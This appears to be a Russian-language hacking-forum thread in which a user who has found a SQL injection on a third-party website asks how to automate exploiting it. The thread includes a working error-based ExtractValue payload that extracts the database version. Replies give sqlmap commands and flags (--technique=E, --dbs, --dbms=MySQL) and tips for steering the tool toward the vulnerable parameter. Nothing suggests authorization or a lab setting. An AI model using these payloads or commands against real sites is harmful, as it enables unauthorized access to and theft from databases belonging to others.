![]() |
Есть SQL
http://сайт ру/crysis-1' SQLmmp не видит level и Risk не помогает Как можно вьебать данную херню ? 'or(ExtractValue(1,concat(0x3a,(select(version())) )))='1 (показует версию) могу увидеть название и самой BD но мне нужно автоматизировать |
я дико извиняюсь , а разве sqlmap xpath видит ?
|
Цитата:
|
error based sqlmap видит, технику можно явно указать
Код:
--technique=EE: Error-based U: Union query-based S: Stacked queries T: Time-based blind Q: Inline queries |
Цитата:
Код:
> sqlmap -u site/1'%22/forum/games/call-of-duty-games/call-of-duty-5-world-at-war/page2 --technique=E --dbs |
|
Цитата:
|
Цитата:
вообще если сайт плюётся ошибками на кавычку, то как то странно что скульмап его не видит |
SQL injection on URI parameter '#1*' у тебя в линке. Ты жмякнул Y и он пошел не по той лабуде, а именно #1. Жмякни N и он пойдет по другому параметру. Если бурпом как вижу сканил, то мап 100% должен видеть уязвимость. Тем более в GET запросе. Пробуй указать принудительно тип базы данных, чтобы он по всем не шел. --dbms=MySQL
|
Цитата:
|
| Время: 17:47 |